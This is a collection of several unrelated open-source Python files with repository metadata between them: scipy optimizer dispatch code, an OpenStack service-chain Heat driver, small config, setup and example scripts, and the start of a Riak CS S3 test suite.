elif bounds is not None:
method = 'L-BFGS-B'
else:
method = 'BFGS'
if callable(method):
meth = "_custom"
else:
meth = method.lower()
if options is None:
options = {}
# check if optional parameters are supported by the selected method
# - jac
if meth in ['nelder-mead', 'powell', 'cobyla'] and bool(jac):
warn('Method %s does not use gradient information (jac).' % method,
RuntimeWarning)
# - hess
if meth not in ('newton-cg', 'dogleg', 'trust-ncg', '_custom') and hess is not None:
warn('Method %s does not use Hessian information (hess).' % method,
RuntimeWarning)
# - hessp
if meth not in ('newton-cg', 'dogleg', 'trust-ncg', '_custom') and hessp is not None:
warn('Method %s does not use Hessian-vector product '
'information (hessp).' % method, RuntimeWarning)
# - constraints or bounds
if (meth in ['nelder-mead', 'powell', 'cg', 'bfgs', 'newton-cg', 'dogleg',
'trust-ncg'] and (bounds is not None or np.any(constraints))):
warn('Method %s cannot handle constraints nor bounds.' % method,
RuntimeWarning)
if meth in ['l-bfgs-b', 'tnc'] and np.any(constraints):
warn('Method %s cannot handle constraints.' % method,
RuntimeWarning)
if meth == 'cobyla' and bounds is not None:
warn('Method %s cannot handle bounds.' % method,
RuntimeWarning)
# - callback
if (meth in ['cobyla'] and callback is not None):
warn('Method %s does not support callback.' % method, RuntimeWarning)
# - return_all
if (meth in ['l-bfgs-b', 'tnc', 'cobyla', 'slsqp'] and
options.get('return_all', False)):
warn('Method %s does not support the return_all option.' % method,
RuntimeWarning)
# fun also returns the jacobian
if not callable(jac):
if bool(jac):
fun = MemoizeJac(fun)
jac = fun.derivative
else:
jac = None
# set default tolerances
if tol is not None:
options = dict(options)
if meth == 'nelder-mead':
options.setdefault('xatol', tol)
options.setdefault('fatol', tol)
if meth in ['newton-cg', 'powell', 'tnc']:
options.setdefault('xtol', tol)
if meth in ['powell', 'l-bfgs-b', 'tnc', 'slsqp']:
options.setdefault('ftol', tol)
if meth in ['bfgs', 'cg', 'l-bfgs-b', 'tnc', 'dogleg', 'trust-ncg']:
options.setdefault('gtol', tol)
if meth in ['cobyla', '_custom']:
options.setdefault('tol', tol)
if meth == '_custom':
return method(fun, x0, args=args, jac=jac, hess=hess, hessp=hessp,
bounds=bounds, constraints=constraints,
callback=callback, **options)
elif meth == 'nelder-mead':
return _minimize_neldermead(fun, x0, args, callback, **options)
elif meth == 'powell':
return _minimize_powell(fun, x0, args, callback, **options)
elif meth == 'cg':
return _minimize_cg(fun, x0, args, jac, callback, **options)
elif meth == 'bfgs':
return _minimize_bfgs(fun, x0, args, jac, callback, **options)
elif meth == 'newton-cg':
return _minimize_newtoncg(fun, x0, args, jac, hess, hessp, callback,
**options)
elif meth == 'l-bfgs-b':
return _minimize_lbfgsb(fun, x0, args, jac, bounds,
callback=callback, **options)
elif meth == 'tnc':
return _minimize_tnc(fun, x0, args, jac, bounds, callback=callback,
**options)
elif meth == 'cobyla':
return _minimize_cobyla(fun, x0, args, constraints, **options)
elif meth == 'slsqp':
return _minimize_slsqp(fun, x0, args, jac, bounds,
constraints, callback=callback, **options)
elif meth == 'dogleg':
return _minimize_dogleg(fun, x0, args, jac, hess,
callback=callback, **options)
elif meth == 'trust-ncg':
return _minimize_trust_ncg(fun, x0, args, jac, hess, hessp,
callback=callback, **options)
else:
raise ValueError('Unknown solver %s' % method)
def minimize_scalar(fun, bracket=None, bounds=None, args=(),
                    method='brent', tol=None, options=None):
    """Minimization of scalar function of one variable.

    Parameters
    ----------
    fun : callable
        Objective function.  Must take a scalar and return a scalar.
    bracket : sequence, optional
        For the 'brent' and 'golden' methods, the bracketing interval:
        either three items ``(a, b, c)`` with ``a < b < c`` and
        ``fun(b) < fun(a), fun(c)``, or two items ``a`` and ``c`` taken
        as the starting interval of a downhill bracket search (see
        `bracket`).  The obtained solution does not necessarily satisfy
        ``a <= x <= c``.
    bounds : sequence, optional
        Mandatory for method 'bounded': the two items are the
        optimization bounds.
    args : tuple, optional
        Extra arguments passed to the objective function.
    method : str or callable, optional
        Type of solver.  Should be one of

        - 'Brent' :ref:`(see here) <optimize.minimize_scalar-brent>`
        - 'Bounded' :ref:`(see here) <optimize.minimize_scalar-bounded>`
        - 'Golden' :ref:`(see here) <optimize.minimize_scalar-golden>`
        - custom - a callable object (added in version 0.14.0), see below

    tol : float, optional
        Tolerance for termination.  For detailed control, use
        solver-specific options.
    options : dict, optional
        A dictionary of solver options.

        maxiter : int
            Maximum number of iterations to perform.
        disp : bool
            Set to True to print convergence messages.

        See :func:`show_options()` for solver-specific options.

    Returns
    -------
    res : OptimizeResult
        The optimization result represented as a ``OptimizeResult``
        object.  Important attributes are: ``x`` the solution array,
        ``success`` a Boolean flag indicating if the optimizer exited
        successfully and ``message`` which describes the cause of the
        termination.  See `OptimizeResult` for a description of other
        attributes.

    See also
    --------
    minimize : Interface to minimization algorithms for scalar
        multivariate functions
    show_options : Additional options accepted by the solvers

    Notes
    -----
    This section describes the available solvers that can be selected by
    the 'method' parameter.  The default method is *Brent*.

    Method :ref:`Brent <optimize.minimize_scalar-brent>` uses Brent's
    algorithm to find a local minimum, applying inverse parabolic
    interpolation when possible to speed up convergence of the golden
    section method.

    Method :ref:`Golden <optimize.minimize_scalar-golden>` uses the
    golden section search technique, an analog of the bisection method
    that shrinks the bracketed interval.  The *Brent* method is usually
    preferable.

    Method :ref:`Bounded <optimize.minimize_scalar-bounded>` performs
    bounded minimization, using the Brent method to find a local minimum
    in the interval x1 < xopt < x2.

    **Custom minimizers**

    Passing a custom minimization method can be useful, for instance when
    using some library frontend to minimize_scalar; simply supply a
    callable as the ``method`` parameter.

    The callable is called as ``method(fun, args, **kwargs, **options)``
    where ``kwargs`` corresponds to any other parameters passed to
    `minimize` (such as `bracket`, `tol`, etc.), except the `options`
    dict, whose contents are also passed as `method` parameters pair by
    pair.  The method shall return an ``OptimizeResult`` object.

    The provided `method` callable must be able to accept (and possibly
    ignore) arbitrary parameters; the set of parameters accepted by
    `minimize` may expand in future versions and then these parameters
    will be passed to the method.  You can find an example in the
    scipy.optimize tutorial.

    .. versionadded:: 0.11.0

    Examples
    --------
    Consider the problem of minimizing the following function.

    >>> def f(x):
    ...     return (x - 2) * x * (x + 2)**2

    Using the *Brent* method, we find the local minimum as:

    >>> from scipy.optimize import minimize_scalar
    >>> res = minimize_scalar(f)
    >>> res.x
    1.28077640403

    Using the *Bounded* method, we find a local minimum with specified
    bounds as:

    >>> res = minimize_scalar(f, bounds=(-3, -1), method='bounded')
    >>> res.x
    -2.0000002026
    """
    if not isinstance(args, tuple):
        args = (args,)

    # Normalize the solver selection: a callable takes the custom path,
    # otherwise solver names are matched case-insensitively.
    solver = "_custom" if callable(method) else method.lower()
    opts = {} if options is None else options

    if tol is not None:
        # Work on a copy so the caller's options dict is never mutated.
        opts = dict(opts)
        if solver == 'bounded' and 'xatol' not in opts:
            warn("Method 'bounded' does not support relative tolerance in x; "
                 "defaulting to absolute tolerance.", RuntimeWarning)
            opts['xatol'] = tol
        elif solver == '_custom':
            opts.setdefault('tol', tol)
        else:
            # Covers brent/golden (and 'bounded' when 'xatol' was given,
            # matching the historical behavior of this dispatcher).
            opts.setdefault('xtol', tol)

    if solver == '_custom':
        return method(fun, args=args, bracket=bracket, bounds=bounds, **opts)
    if solver == 'brent':
        return _minimize_scalar_brent(fun, bracket, args, **opts)
    if solver == 'golden':
        return _minimize_scalar_golden(fun, bracket, args, **opts)
    if solver == 'bounded':
        if bounds is None:
            raise ValueError('The `bounds` parameter is mandatory for '
                             'method `bounded`.')
        return _minimize_scalar_bounded(fun, bounds, args, **opts)
    raise ValueError('Unknown solver %s' % method)
| {
"content_hash": "3835d3762330648885cb99a8235d31aa",
"timestamp": "",
"source": "github",
"line_count": 616,
"max_line_length": 89,
"avg_line_length": 42.910714285714285,
"alnum_prop": 0.6386713577724814,
"repo_name": "DailyActie/Surrogate-Model",
"id": "622c32eaa7231178c68c4803410582e04cf97089",
"size": "26433",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "01-codes/scipy-master/scipy/optimize/_minimize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "345"
},
{
"name": "Batchfile",
"bytes": "18746"
},
{
"name": "C",
"bytes": "13004913"
},
{
"name": "C++",
"bytes": "14692003"
},
{
"name": "CMake",
"bytes": "72831"
},
{
"name": "CSS",
"bytes": "303488"
},
{
"name": "Fortran",
"bytes": "7339415"
},
{
"name": "HTML",
"bytes": "854774"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "2432846"
},
{
"name": "Jupyter Notebook",
"bytes": "829689"
},
{
"name": "M4",
"bytes": "1379"
},
{
"name": "Makefile",
"bytes": "48708"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PHP",
"bytes": "93585"
},
{
"name": "Pascal",
"bytes": "1449"
},
{
"name": "Perl",
"bytes": "1152272"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "34668203"
},
{
"name": "Roff",
"bytes": "5925"
},
{
"name": "Ruby",
"bytes": "92498"
},
{
"name": "Shell",
"bytes": "94698"
},
{
"name": "TeX",
"bytes": "156540"
},
{
"name": "TypeScript",
"bytes": "41691"
}
],
"symlink_target": ""
} |
import ast
import time
from heatclient import client as heat_client
from heatclient import exc as heat_exc
from neutron.common import log
from neutron.db import model_base
from neutron import manager
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as pconst
from oslo.config import cfg
import sqlalchemy as sa
from gbpservice.neutron.services.servicechain.common import exceptions as exc
# Module-level logger for this service chain driver.
LOG = logging.getLogger(__name__)

# Driver configuration options, registered under the [simplechain]
# section of the Neutron configuration file.
service_chain_opts = [
    cfg.IntOpt('stack_delete_retries',
               default=5,
               help=_("Number of attempts to retry for stack deletion")),
    cfg.IntOpt('stack_delete_retry_wait',
               default=3,
               help=_("Wait time between two successive stack delete "
                      "retries")),
    cfg.StrOpt('heat_uri',
               default='http://localhost:8004/v1',
               help=_("Heat server address to create services "
                      "specified in the service chain.")),
    cfg.StrOpt('heat_ca_certificates_file', default=None,
               help=_('CA file for heatclient to verify server certificates')),
    cfg.BoolOpt('heat_api_insecure', default=False,
                help=_("If True, ignore any SSL validation issues")),
]

cfg.CONF.register_opts(service_chain_opts, "simplechain")

# Service chain API supported Values
sc_supported_type = [pconst.LOADBALANCER, pconst.FIREWALL]

# Snapshot the stack-deletion retry settings once at import time; the
# polling loop in SimpleChainDriver._wait_for_stack_delete reads these.
STACK_DELETE_RETRIES = cfg.CONF.simplechain.stack_delete_retries
STACK_DELETE_RETRY_WAIT = cfg.CONF.simplechain.stack_delete_retry_wait
class ServiceChainInstanceStack(model_base.BASEV2):
    """ServiceChainInstance stacks owned by the servicechain driver."""

    __tablename__ = 'sc_instance_stacks'
    # UUID of the servicechain instance that owns the Heat stack.
    instance_id = sa.Column(sa.String(36),
                            nullable=False, primary_key=True)
    # UUID of the Heat stack created on behalf of the instance.  Both
    # columns form the primary key, so one instance can own many stacks
    # (one per chain node).
    stack_id = sa.Column(sa.String(36),
                         nullable=False, primary_key=True)
class SimpleChainDriver(object):
@log.log
def initialize(self):
pass
@log.log
def create_servicechain_node_precommit(self, context):
if context.current['service_profile_id'] is None:
if context.current['service_type'] not in sc_supported_type:
raise exc.InvalidServiceTypeForReferenceDriver()
elif context.current['service_type']:
LOG.warn(_('Both service_profile_id and service_type are'
'specified, service_type will be ignored.'))
@log.log
def create_servicechain_node_postcommit(self, context):
pass
@log.log
def update_servicechain_node_precommit(self, context):
if (context.original['config'] != context.current['config']):
filters = {'servicechain_spec': context.original[
'servicechain_specs']}
sc_instances = context._plugin.get_servicechain_instances(
context._plugin_context, filters)
if sc_instances:
raise exc.NodeUpdateNotSupported()
@log.log
def update_servicechain_node_postcommit(self, context):
pass
@log.log
def delete_servicechain_node_precommit(self, context):
pass
@log.log
def delete_servicechain_node_postcommit(self, context):
pass
@log.log
def create_servicechain_spec_precommit(self, context):
pass
@log.log
def create_servicechain_spec_postcommit(self, context):
pass
@log.log
def update_servicechain_spec_precommit(self, context):
pass
@log.log
def update_servicechain_spec_postcommit(self, context):
if context.original['nodes'] != context.current['nodes']:
filters = {'servicechain_spec': [context.original['id']]}
sc_instances = context._plugin.get_servicechain_instances(
context._plugin_context, filters)
for sc_instance in sc_instances:
self._update_servicechain_instance(context,
sc_instance,
context._sc_spec)
@log.log
def delete_servicechain_spec_precommit(self, context):
pass
@log.log
def delete_servicechain_spec_postcommit(self, context):
pass
@log.log
def create_servicechain_instance_precommit(self, context):
pass
@log.log
def create_servicechain_instance_postcommit(self, context):
sc_instance = context.current
sc_spec_ids = sc_instance.get('servicechain_specs')
for sc_spec_id in sc_spec_ids:
sc_spec = context._plugin.get_servicechain_spec(
context._plugin_context, sc_spec_id)
sc_node_ids = sc_spec.get('nodes')
self._create_servicechain_instance_stacks(context, sc_node_ids,
sc_instance, sc_spec)
@log.log
def update_servicechain_instance_precommit(self, context):
pass
@log.log
def update_servicechain_instance_postcommit(self, context):
original_spec_ids = context.original.get('servicechain_specs')
new_spec_ids = context.current.get('servicechain_specs')
if set(original_spec_ids) != set(new_spec_ids):
for new_spec_id in new_spec_ids:
newspec = context._plugin.get_servicechain_spec(
context._plugin_context, new_spec_id)
self._update_servicechain_instance(context, context.current,
newspec)
@log.log
def delete_servicechain_instance_precommit(self, context):
pass
@log.log
def delete_servicechain_instance_postcommit(self, context):
self._delete_servicechain_instance_stacks(context._plugin_context,
context.current['id'])
@log.log
def create_service_profile_precommit(self, context):
if context.current['service_type'] not in sc_supported_type:
raise exc.InvalidServiceTypeForReferenceDriver()
@log.log
def create_service_profile_postcommit(self, context):
pass
@log.log
def update_service_profile_precommit(self, context):
pass
@log.log
def update_service_profile_postcommit(self, context):
pass
@log.log
def delete_service_profile_precommit(self, context):
pass
@log.log
def delete_service_profile_postcommit(self, context):
pass
def _get_ptg(self, context, ptg_id):
return self._get_resource(self._grouppolicy_plugin,
context._plugin_context,
'policy_target_group',
ptg_id)
def _get_pt(self, context, pt_id):
return self._get_resource(self._grouppolicy_plugin,
context._plugin_context,
'policy_target',
pt_id)
def _get_port(self, context, port_id):
return self._get_resource(self._core_plugin,
context._plugin_context,
'port',
port_id)
def _get_ptg_subnet(self, context, ptg_id):
ptg = self._get_ptg(context, ptg_id)
return ptg.get("subnets")[0]
def _get_member_ips(self, context, ptg_id):
ptg = self._get_ptg(context, ptg_id)
pt_ids = ptg.get("policy_targets")
member_addresses = []
for pt_id in pt_ids:
pt = self._get_pt(context, pt_id)
port_id = pt.get("port_id")
port = self._get_port(context, port_id)
ipAddress = port.get('fixed_ips')[0].get("ip_address")
member_addresses.append(ipAddress)
return member_addresses
def _fetch_template_and_params(self, context, sc_instance,
sc_spec, sc_node):
stack_template = sc_node.get('config')
# TODO(magesh):Raise an exception ??
if not stack_template:
LOG.error(_("Service Config is not defined for the service"
" chain Node"))
return
stack_template = jsonutils.loads(stack_template)
config_param_values = sc_instance.get('config_param_values', {})
stack_params = {}
# config_param_values has the parameters for all Nodes. Only apply
# the ones relevant for this Node
if config_param_values:
config_param_values = jsonutils.loads(config_param_values)
config_param_names = sc_spec.get('config_param_names', [])
if config_param_names:
config_param_names = ast.literal_eval(config_param_names)
# This service chain driver knows how to fill in two parameter values
# for the template at present.
# 1)Subnet -> Provider PTG subnet is used
# 2)PoolMemberIPs -> List of IP Addresses of all PTs in Provider PTG
# TODO(magesh):Process on the basis of ResourceType rather than Name
# eg: Type: OS::Neutron::PoolMember
# Variable number of pool members is not handled yet. We may have to
# dynamically modify the template json to achieve that
member_ips = []
provider_ptg_id = sc_instance.get("provider_ptg_id")
# If we have the key "PoolMemberIP*" in template input parameters,
# fetch the list of IPs of all PTs in the PTG
for key in config_param_names or []:
if "PoolMemberIP" in key:
member_ips = self._get_member_ips(context, provider_ptg_id)
break
member_count = 0
for key in config_param_names or []:
if "PoolMemberIP" in key:
value = (member_ips[member_count]
if len(member_ips) > member_count else '0')
member_count = member_count + 1
config_param_values[key] = value
elif key == "Subnet":
value = self._get_ptg_subnet(context, provider_ptg_id)
config_param_values[key] = value
node_params = (stack_template.get('Parameters')
or stack_template.get('parameters'))
if node_params:
for parameter in config_param_values.keys():
if parameter in node_params.keys():
stack_params[parameter] = config_param_values[parameter]
return (stack_template, stack_params)
def _create_servicechain_instance_stacks(self, context, sc_node_ids,
sc_instance, sc_spec):
heatclient = HeatClient(context._plugin_context)
for sc_node_id in sc_node_ids:
sc_node = context._plugin.get_servicechain_node(
context._plugin_context, sc_node_id)
stack_template, stack_params = self._fetch_template_and_params(
context, sc_instance, sc_spec, sc_node)
stack_name = ("stack_" + sc_instance['name'] + sc_node['name'] +
sc_instance['id'][:8])
stack = heatclient.create(
stack_name.replace(" ", ""), stack_template, stack_params)
self._insert_chain_stack_db(
context._plugin_context.session, sc_instance['id'],
stack['stack']['id'])
def _delete_servicechain_instance_stacks(self, context, instance_id):
stack_ids = self._get_chain_stacks(context.session, instance_id)
heatclient = HeatClient(context)
for stack in stack_ids:
heatclient.delete(stack.stack_id)
for stack in stack_ids:
self._wait_for_stack_delete(heatclient, stack.stack_id)
self._delete_chain_stacks_db(context.session, instance_id)
# Wait for the heat stack to be deleted for a maximum of 15 seconds
# we check the status every 3 seconds and call sleep again
# This is required because cleanup of subnet fails when the stack created
# some ports on the subnet and the resource delete is not completed by
# the time subnet delete is triggered by Resource Mapping driver
def _wait_for_stack_delete(self, heatclient, stack_id):
stack_delete_retries = STACK_DELETE_RETRIES
while True:
try:
stack = heatclient.get(stack_id)
if stack.stack_status == 'DELETE_COMPLETE':
return
elif stack.stack_status == 'DELETE_FAILED':
heatclient.delete(stack_id)
except Exception:
LOG.exception(_("Service Chain Instance cleanup may not have "
"happened because Heat API request failed "
"while waiting for the stack %(stack)s to be "
"deleted"), {'stack': stack_id})
return
else:
time.sleep(STACK_DELETE_RETRY_WAIT)
stack_delete_retries = stack_delete_retries - 1
if stack_delete_retries == 0:
LOG.warn(_("Resource cleanup for service chain instance is"
" not completed within %(wait)s seconds as "
"deletion of Stack %(stack)s is not completed"),
{'wait': (STACK_DELETE_RETRIES *
STACK_DELETE_RETRY_WAIT),
'stack': stack_id})
return
else:
continue
def _get_instance_by_spec_id(self, context, spec_id):
filters = {'servicechain_spec': [spec_id]}
return context._plugin.get_servicechain_instances(
context._plugin_context, filters)
def _update_servicechain_instance(self, context, sc_instance, newspec):
self._delete_servicechain_instance_stacks(context._plugin_context,
sc_instance['id'])
sc_node_ids = newspec.get('nodes')
self._create_servicechain_instance_stacks(context,
sc_node_ids,
sc_instance,
newspec)
def _delete_chain_stacks_db(self, session, sc_instance_id):
with session.begin(subtransactions=True):
stacks = session.query(ServiceChainInstanceStack
).filter_by(instance_id=sc_instance_id
).all()
for stack in stacks:
session.delete(stack)
def _insert_chain_stack_db(self, session, sc_instance_id, stack_id):
with session.begin(subtransactions=True):
chainstack = ServiceChainInstanceStack(
instance_id=sc_instance_id,
stack_id=stack_id)
session.add(chainstack)
def _get_chain_stacks(self, session, sc_instance_id):
with session.begin(subtransactions=True):
stack_ids = session.query(ServiceChainInstanceStack.stack_id
).filter_by(instance_id=sc_instance_id
).all()
return stack_ids
def _get_resource(self, plugin, context, resource, resource_id):
obj_getter = getattr(plugin, 'get_' + resource)
obj = obj_getter(context, resource_id)
return obj
    @property
    def _core_plugin(self):
        """Neutron core plugin, looked up lazily on every access."""
        # REVISIT(Magesh): Need initialization method after all
        # plugins are loaded to grab and store plugin.
        return manager.NeutronManager.get_plugin()
    @property
    def _grouppolicy_plugin(self):
        """Group Policy service plugin.

        Raises ServiceChainDeploymentError when the plugin is not loaded,
        since the driver cannot function without it.
        """
        # REVISIT(Magesh): Need initialization method after all
        # plugins are loaded to grab and store plugin.
        plugins = manager.NeutronManager.get_service_plugins()
        grouppolicy_plugin = plugins.get(pconst.GROUP_POLICY)
        if not grouppolicy_plugin:
            LOG.error(_("No Grouppolicy service plugin found."))
            raise exc.ServiceChainDeploymentError()
        return grouppolicy_plugin
class HeatClient:
    """Thin convenience wrapper around python-heatclient.

    Exposes just the stack operations the simplechain driver needs:
    create, delete (404-tolerant) and get.
    """

    def __init__(self, context, password=None):
        # Heat endpoints are tenant-scoped: <heat_uri>/<tenant-id>.
        endpoint = "%s/%s" % (cfg.CONF.simplechain.heat_uri, context.tenant)
        self.client = heat_client.Client("1", endpoint,
                                         token=context.auth_token,
                                         username=context.user_name,
                                         password=password)
        self.stacks = self.client.stacks

    def create(self, name, data, parameters=None):
        """Create a stack named *name* from template dict *data*."""
        fields = {'stack_name': name,
                  'timeout_mins': 10,
                  'disable_rollback': True,
                  'password': data.get('password'),
                  'template': data,
                  'parameters': parameters}
        return self.stacks.create(**fields)

    def delete(self, stack_id):
        """Delete a stack; an already-missing stack is logged, not raised."""
        try:
            self.stacks.delete(stack_id)
        except heat_exc.HTTPNotFound:
            LOG.warn(_("Stack %(stack)s created by service chain driver is "
                       "not found at cleanup"), {'stack': stack_id})

    def get(self, stack_id):
        """Fetch the current state of a stack."""
        return self.stacks.get(stack_id)
| {
"content_hash": "38439522e5564ff6802eca17ef7c7e07",
"timestamp": "",
"source": "github",
"line_count": 436,
"max_line_length": 79,
"avg_line_length": 39.97935779816514,
"alnum_prop": 0.5768458493488612,
"repo_name": "oneconvergence/group-based-policy",
"id": "1ba54d352fd3c702e8c61ba11b07b8bab9f904dc",
"size": "18004",
"binary": false,
"copies": "1",
"ref": "refs/heads/oneconvergence_service_node_driver",
"path": "gbpservice/neutron/services/servicechain/plugins/msc/drivers/simplechain_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1741199"
},
{
"name": "Shell",
"bytes": "27976"
}
],
"symlink_target": ""
} |
# OAuth 2.0 scope requested for the Google Calendar API.
SCOPE = 'https://www.googleapis.com/auth/calendar'
# User-Agent string sent with API requests.
USER_AGENT = 'GoogleCalendarDisplay/1.0'
# OAuth client credentials -- presumably filled in by the deployer from
# the Google API console (left blank in source control).
CLIENT_ID = ''
CLIENT_SECRET = ''
# API ("developer") key from the Google API console.
DEVELOPER_KEY = ''
# Identifier of the calendar to display.
CALENDAR = ''
# Timezone name used for the calendar; exact expected format not
# determinable from this file -- see the consuming code.
TIMEZONE = ''
| {
"content_hash": "a9c6b3ae6090a7e6b56bbb6c694bdcbc",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 50,
"avg_line_length": 21.75,
"alnum_prop": 0.6781609195402298,
"repo_name": "barneyman/gcalMeetingRoom",
"id": "b456935e6b7e63577aba69850341f271ce199911",
"size": "174",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calendar_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18649"
},
{
"name": "Shell",
"bytes": "255"
}
],
"symlink_target": ""
} |
from distutils.core import setup

# Packaging metadata for the `clavin` wrapper package.  The download_url
# tarball tag must be kept in sync with `version` on each release.
setup(
  name = 'clavin',
  packages = ['clavin'],
  version = '0.7',
  description = 'A python wrapper for CLAVIN, a Java engine originally built by Berico Technologies',
  author = 'Daniel J. Dufour',
  author_email = 'daniel.j.dufour@gmail.com',
  url = 'https://github.com/danieljdufour/clavin-python',
  download_url = 'https://github.com/danieljdufour/clavin-python/tarball/0.7',
  keywords = ['geotag'],
  classifiers = [],
)
| {
"content_hash": "093833c7a14a1f9abf6d7bf2ccf0feaa",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 101,
"avg_line_length": 33.357142857142854,
"alnum_prop": 0.6916488222698073,
"repo_name": "DanielJDufour/clavin-python",
"id": "15db8d46f5f4f07fcaf1a4a414d6554967285bfc",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3279"
}
],
"symlink_target": ""
} |
import elementtree.ElementTree as ET
from basecamp import Basecamp
# Demo (Python 2): fetch one Basecamp todo list and print each item's text.
# Authenticate with an API key, or with username/password (commented out).
bc = Basecamp('https://example.basecamphq.com', 'API_KEY')
# or
# bc = Basecamp('https://example.basecamphq.com', 'user', 'password')

# Fetch one todo list from its ID
xml = bc.todo_list(14499317)
items = ET.fromstring(xml).findall('todo-items/todo-item')

# Let's use the ElementTree API to access data via path expressions:
for item in items:
    print item.find("content").text
"content_hash": "a90f74291bf8dfccc2ec9eea89884c81",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 69,
"avg_line_length": 32.142857142857146,
"alnum_prop": 0.7333333333333333,
"repo_name": "qpleple/basecamp-python-client",
"id": "310f05307872a0815279b87278dbd9a6405dc216",
"size": "504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21222"
}
],
"symlink_target": ""
} |
import os, httplib, json, unittest, uuid, md5
from cStringIO import StringIO
from file_generator import FileGenerator
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from boto.utils import compute_md5
import boto
def setup_auth_scheme():
    """Pick the AWS signature version from the CS_AUTH env var.

    Defaults to v2; set CS_AUTH=auth-v4 to use Signature Version 4.
    """
    if not boto.config.has_section('s3'):
        boto.config.add_section('s3')
    mechanism = os.environ.get('CS_AUTH', 'auth-v2')
    if mechanism == 'auth-v4':
        setup_auth_v4()
    else:
        setup_auth_v2()
def setup_auth_v4():
    """Configure boto to sign requests with AWS Signature Version 4."""
    print('Use AWS Version 4 authentication')
    if boto.config.get('s3', 'use-sigv4'):
        return
    boto.config.set('s3', 'use-sigv4', 'True')
def setup_auth_v2():
    """Configure boto to sign requests with AWS Signature Version 2."""
    print('Use AWS Version 2 authentication')
    if boto.config.get('s3', 'use-sigv4'):
        return
    boto.config.set('s3', 'use-sigv4', '')
# Configure boto's signature scheme once at import time, before any
# S3Connection objects are created by the tests below.
setup_auth_scheme()
def create_user(host, port, name, email):
    """Create a Riak CS user through the admin HTTP API.

    POSTs {"email": ..., "name": ...} to /riak-cs/user and returns the
    decoded JSON user record (which includes the generated key_id and
    key_secret used by the tests).
    """
    body = json.dumps({"email": email, "name": name})
    conn = httplib.HTTPConnection(host, port)
    try:
        conn.request("POST", '/riak-cs/user', body,
                     {"Content-Type": "application/json"})
        data = conn.getresponse().read()
    finally:
        # Fix: close the connection even when the request/response fails,
        # instead of leaking the socket.
        conn.close()
    return json.loads(data)
def md5_from_key(boto_key):
    """Hex md5 digest of a boto Key's content.

    Iterating a boto Key yields chunks of the object's bytes, so this
    actually downloads the object to compute the digest.
    """
    digest = md5.new()
    for chunk in boto_key:
        digest.update(chunk)
    return digest.hexdigest()
def upload_multipart(bucket, key_name, parts_list, metadata=None, policy=None):
    """Run a complete multipart upload and return (upload, result).

    `parts_list` is a list of file-like objects uploaded as parts 1..N.
    `metadata`, when omitted, behaves as an empty dict.

    Fix: the original declared `metadata={}` -- a shared mutable default
    argument; replaced with a None sentinel that preserves behavior.
    """
    if metadata is None:
        metadata = {}
    upload = bucket.initiate_multipart_upload(key_name, metadata=metadata,
                                              policy=policy)
    for index, part in enumerate(parts_list):
        # S3 part numbers are 1-based.
        upload.upload_part_from_file(part, index + 1)
    result = upload.complete_upload()
    return upload, result
class S3ApiVerificationTestBase(unittest.TestCase):
    """Shared fixture for the S3 API verification suite.

    Connects to a local Riak CS instance through a proxy on 127.0.0.1 and
    creates two fresh users plus per-class bucket/key names in
    setUpClass().  The ACL templates below must match the XML that boto's
    to_xml() produces byte-for-byte, since tests compare them with
    assertEqual.
    """
    host="127.0.0.1"
    # Service port; overridable via the CS_HTTP_PORT environment variable.
    try:
        port=int(os.environ['CS_HTTP_PORT'])
    except KeyError:
        port=8080

    # Populated once per class by setUpClass().
    user1 = None
    user2 = None

    # %-template: owner id/name, grantee id/name, permission.
    SimpleAcl = "<AccessControlPolicy>" + \
        "<Owner>" + \
        "<ID>%s</ID>" + \
        "<DisplayName>%s</DisplayName>" + \
        "</Owner>" + \
        "<AccessControlList>" + \
        "<Grant>" + \
        "<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">" + \
        "<ID>%s</ID>" + \
        "<DisplayName>%s</DisplayName>" + \
        "</Grantee>" + \
        "<Permission>%s</Permission>" + \
        "</Grant>" + \
        "</AccessControlList>" + \
        "</AccessControlPolicy>"
    # Same as SimpleAcl plus a global AllUsers READ grant ('public-read').
    PublicReadAcl = "<AccessControlPolicy>" + \
        "<Owner>" + \
        "<ID>%s</ID>" + \
        "<DisplayName>%s</DisplayName>" + \
        "</Owner>" + \
        "<AccessControlList>" + \
        "<Grant>" + \
        "<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"Group\">" + \
        "<URI>http://acs.amazonaws.com/groups/global/AllUsers</URI>" + \
        "</Grantee>" + \
        "<Permission>READ</Permission>" + \
        "</Grant>" + \
        "<Grant>" + \
        "<Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">" + \
        "<ID>%s</ID>" + \
        "<DisplayName>%s</DisplayName>" + \
        "</Grantee>" + \
        "<Permission>%s</Permission>" + \
        "</Grant>" + \
        "</AccessControlList>" + \
        "</AccessControlPolicy>"

    def make_connection(self, user):
        """S3Connection for *user*, proxied to the local Riak CS port."""
        return S3Connection(user['key_id'], user['key_secret'], is_secure=False,
                            host="s3.amazonaws.com", debug=False,
                            proxy="127.0.0.1", proxy_port=self.port,
                            calling_format=OrdinaryCallingFormat() )

